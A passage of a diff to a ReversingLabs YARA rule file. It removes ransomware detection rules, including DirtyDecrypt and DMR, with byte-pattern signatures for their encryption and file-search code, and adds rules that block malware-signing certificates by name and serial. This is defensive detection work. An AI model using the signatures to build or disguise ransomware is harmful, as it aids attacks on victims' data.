-            ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 5E 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 8B D8 33 C0 56 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 8B
-            45 ?? 6A ?? 50 8D 4D ?? 51 8D 77 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B
-            D3 83 E2 ?? 2B DA 83 EB ?? 83 C4 ?? 89 5D ?? 8B 1D ?? ?? ?? ?? 50 FF D3 89 45 ?? 83
-            F8 ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 51 FF D3 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 81 C2
-            ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? A8 ?? 74 ?? 83 E0 ?? 50 8B
-            45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 51
-            FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 33 C0
-            33 C9 51 50 53 89 45 ?? 89 45 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ??
-            ?? 75 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C9 51 8D 55 ?? 52 33 C0 50 51 53 FF 15 ??
-            ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 55 ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 52 57 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 85 C0 75 ?? 3B 4D ?? 73 ?? 8B D1 83 E2 ?? B8 ?? ??
-            ?? ?? 2B C2 89 45 ?? 57 03 C1 8D 8D ?? ?? ?? ?? 57 51 E8 ?? ?? ?? ?? 8B 4D ?? 03 4D
-            ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 51 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B
-            45 ?? 03 45 ?? 39 45 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 52 57
-            50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 57 E8 ?? ?? ?? ?? 8B 45
-            ?? 83 C4 ?? C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 51 50 56
-            C7 47 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 03 F0 01 45 ?? 8B 55 ?? 6A ??
-            52 56 E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? 50 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51
-            83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 83 C6 ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 68
-            ?? ?? ?? ?? 50 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 83 EE ?? 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 83 C6 ?? 2B F7 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            39 75 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 7D
-            ?? ?? 7E ?? 8B 75 ?? 33 C9 51 8D 55 ?? 52 33 C0 50 51 56 FF 15 ?? ?? ?? ?? 56 FF 15
-            ?? ?? ?? ?? 8B 5D ?? 53 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 45 ?? 8B 4D ?? 50 51
-            FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 5E 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enumerate_resources and $enumerate_files and $encrypt_files and $remote_connection_1 )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shulan Hou" and pe.signatures [ i ] . serial == "74:70:2d:ff:5d:40:56:b8:47:d0:09:a2:26:5f:b1:b3" and 1469664000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Ransomware_Dirtydecrypt : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_353B1Cf7866Ee0B0Acdd532D0Bb1A220 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DirtyDecrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f4d69c3e-a082-5bc9-bf72-4cc330d3de74"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "20b95b80-94a9-51c3-9c6c-2a0ef75b0c0b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.DirtyDecrypt.yara#L3-L112"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "eb6a1c376b0739848b523e741d0d1ebdbc87056d51931fb94c744aa094d6479f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15972-L15988"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "aa8f0fe1517134b6e562c2accc46420a4f0afd77c3a7bbe98d551c54e68ed4c7"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DirtyDecrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$dd_ep = {
-            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 BF 00 00 00 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74
-            1F 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB
-            09 8B 4D ?? 83 C1 ?? 89 4D ?? 83 7D ?? ?? 73 15 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 44 95 ?? EB DC 6A ?? 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ??
-            8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A
-            ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C2 ?? ??
-        }
-		$dd_hash = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 D5 00 00 00 83 7D ?? ?? 0F 84 CB 00 00 00 83 7D ?? ?? 0F 84 C1
-            00 00 00 83 7D ?? ?? 0F 84 B7 00 00 00 83 7D ?? ?? 0F 84 AD 00 00 00 83 7D ?? ?? 0F 84 A3 00 00 00 C7 45 ?? ?? ?? ?? ??
-            8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 6F 83 7D ?? ?? 76 2A 6A ?? 6A ?? 8B
-            55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 51 8B 4D ?? 83 E9 ?? 89 4D ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 6A ?? 8B
-            45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 25 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B
-            45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 33 C9 0F 85 74 FF FF FF 83 7D ?? ?? 74 0A 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 8B
-            E5 5D C2 ?? ??
-        }
-		$dd_getkey = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 31 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 8B 55
-            ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 89 45 ?? 8B 45 ?? 8B E5 5D C2 ?? ??
-        }
-		$dd_destroykey = {
-            55 8B EC 83 7D ?? ?? 74 0A 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 5D C2
-        }
-		$dd_importkey = {
-            55 8B EC 51 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 8B 08 51 8B 55 ?? 52 FF 15 ?? ??
-            ?? ?? 8B 45 ?? 8B E5 5D C2 ?? ??
-        }
-		$dd_decrypt = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 22 01 00 00 83 7D ?? ?? 0F 84 18 01 00 00 83 7D ?? ?? 0F 84 0E
-            01 00 00 83 7D ?? ?? 0F 84 04 01 00 00 83 7D ?? ?? 0F 84 FA 00 00 00 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 33 D2
-            F7 75 ?? 0F AF 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 02 03 45 ?? 89 45 ?? 8B 4D ?? 8B 11 03 55 ?? 52 8B 45 ?? 8B
-            08 51 6A ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 02 8B 45 ?? 83 38 ?? 0F 84 A7 00 00 00 8B 4D ?? 8B 11 8B 45 ?? 03 10 89 55 ?? 83
-            7D ?? ?? 74 61 6A ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 45 ??
-            89 45 ?? 8D 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 1D 8B 4D ?? 03 4D ?? 89
-            4D ?? 8B 55 ?? 2B 55 ?? 89 55 ?? 8B 45 ?? 03 45 ?? 89 45 ?? EB 99 83 7D ?? ?? 75 15 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 45 ??
-            2B 02 8B 4D ?? 89 01 EB 18 8B 55 ?? 8B 02 50 8B 4D ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 45 ?? 8B E5 5D C2
-            ?? ??
-        }
-		$dd_encrypt = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 89 01 00 00 83 7D ?? ?? 0F 84 7F 01 00 00 83 7D ?? ?? 0F 84 75
-            01 00 00 83 7D ?? ?? 0F 84 6B 01 00 00 83 7D ?? ?? 0F 84 61 01 00 00 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 4D ?? 83 E9
-            ?? 89 4D ?? 8B 55 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 26 01
-            00 00 8B 55 ?? 3B 55 ?? 76 08 8B 45 ?? 89 45 ?? EB 06 8B 4D ?? 89 4D ?? 8B 55 ?? 89 55 ?? 8B 45 ?? 33 D2 F7 75 ?? 0F AF
-            45 ?? 8B 4D ?? 8B 11 03 D0 03 55 ?? 89 55 ?? 8B 45 ?? 50 8B 4D ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 55 ??
-            83 3A ?? 0F 84 CF 00 00 00 8B 45 ?? 8B 08 8B 55 ?? 03 0A 89 4D ?? 83 7D ?? ?? 0F 84 84 00 00 00 8B 45 ?? 3B 45 ?? 73 08
-            8B 4D ?? 89 4D ?? EB 06 8B 55 ?? 89 55 ?? 8B 45 ?? 89 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B
-            4D ?? 89 4D ?? 8B 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 2D 8B
-            45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 55 ?? 03 55 ?? 89 55 ?? 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 4D ?? 03 4D ?? 89 4D ?? E9
-            72 FF FF FF 83 7D ?? ?? 75 16 8B 55 ?? 8B 45 ?? 2B 02 8B 4D ?? 89 01 C7 45 ?? ?? ?? ?? ?? EB 18 8B 55 ?? 8B 02 50 8B 4D
-            ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 45 ?? 8B E5 5D C2 ?? ??
-        }
-		$dd_provparam = {
-            55 8B EC 83 EC ?? 83 7D ?? ?? 0F 84 94 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ??
-            8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 74 3F 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 2A 6A ?? 8D 45 ??
-            50 8B 4D ?? 51 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 10 8B 45 ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B
-            4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 1D 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 E8
-            ?? ?? ?? ?? 8B E5 5D C2 ?? ??
-        }
-		$dd_acquirecontext = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 0B 8B 45 ?? 0D ?? ?? ?? ?? 89 45 ?? C7 45 ??
-            ?? ?? ?? ?? 83 7D ?? ?? 75 07 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 45 ?? 50 6A ?? 6A ?? 6A ?? 8D 4D ?? 51 E8 ?? ?? ??
-            ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 39 8B 45 ?? 83 C8 ?? 50 6A ?? 8B 4D
-            ?? 51 8D 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 1A 6A ?? 6A ?? 6A ?? 8D 4D ?? 51 8D 55 ?? 52 FF 15 ?? ?? ?? ??
-            85 C0 75 02 EB 0E 6A ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 9D 8B 45 ?? 8B E5 5D C2 ?? ??
-        }
-		$dd_mrwhite = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 64 01 00 00 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 12 83 3D ?? ?? ?? ?? ?? 74 09 83 3D ?? ?? ?? ?? ?? 75 05 E9 13
-            01 00 00 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 75 05 E9 F0 00 00 00 8B 95
-            ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74
-            05 E9 C0 00 00 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 74 09 83 BD ?? ?? ?? ?? ?? 73 05 E9 9B
-            00 00 00 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            75 02 EB 72 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 02 83 C0 ?? 3B 85 ?? ?? ?? ?? 76 02 EB 51 8B 8D ??
-            ?? ?? ?? 83 39 ?? 74 3E 0F B7 95 ?? ?? ?? ?? 83 FA ?? 75 32 8B 85 ?? ?? ?? ?? 8B 08 51 8B 95 ?? ?? ?? ?? 83 C2 ?? 52 6A
-            ?? 8D 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 33 C0 0F 85 CD FE FF FF 8D 8D
-            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? 8B E5 5D C2 ?? ??
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $dd_ep at pe.entry_point ) and $dd_hash and $dd_getkey and $dd_destroykey and $dd_importkey and $dd_decrypt and $dd_encrypt and $dd_provparam and $dd_acquirecontext and $dd_mrwhite
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Network Freak Limited" and pe.signatures [ i ] . serial == "35:3b:1c:f7:86:6e:e0:b0:ac:dd:53:2d:0b:b1:a2:20" and 1558915200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_DMR : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_093Ff2870Fa33Eaf47259457Ee58C2E0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DMR ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "45d8f91f-d2d0-5c6e-a29e-b8c9c29dc296"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "3fd458e6-bf5a-51f3-9b46-344e9f8e0ffe"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.DMR.yara#L1-L214"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "55e19f3017c2cc8355c27f9a516e611b58b108f15bfed41b88d5662b55677a59"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15990-L16006"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1aafe547b8645f07498bac6f0ffd6d5aefbac160aa7a6fb8d1d891e70701ce99"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DMR"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53
-            57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ??
-            51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ??
-            ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
-            ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B
-            CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ??
-            23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8
-            1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
-            ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74
-        }
-		$find_files_p2 = {
-            80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ??
-            ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ??
-            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ??
-            ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ??
-            5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8D 45 ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 55 ?? FF B5 ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
-            8B 55 ?? 88 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
-            E8 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ??
-            ?? 8D 55 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 45 ??
-            83 7D ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 E0 ?? 8D 4D ?? 83 7D ?? ?? 50 0F 43
-        }
-		$encrypt_files_p2 = {
-            4D ?? 51 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 8D
-            ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ??
-            ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D BE ??
-            ?? ?? ?? C6 45 ?? ?? 83 7F ?? ?? 8B C7 89 BD ?? ?? ?? ?? 72 ?? 8B 07 83 7F ?? ?? 75
-            ?? 0F B6 00 3C ?? 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? C7 86 ?? ?? ?? ?? ??
-            ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 8B 86 ?? ?? ?? ?? 6A ?? 50 8D 4D ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 8B 86 ?? ??
-            ?? ?? 83 7D ?? ?? 99 0F 43 4D ?? 52 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? 8B 55 ?? 3B CA 77 ?? 83 7D ?? ?? 8D 45 ?? 89 4D ?? 0F 43 45 ?? C6 04 01 ??
-            EB ?? 8B 45 ?? 8B F9 2B FA 2B C2 3B F8 77 ?? 83 7D ?? ?? 8D 75 ?? 57 0F 43 75 ?? 03
-        }
-		$encrypt_files_p3 = {
-            F2 89 4D ?? 6A ?? 56 E8 ?? ?? ?? ?? C6 04 3E ?? 83 C4 ?? 8B B5 ?? ?? ?? ?? EB ?? 6A
-            ?? 57 C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B BD ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8
-            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
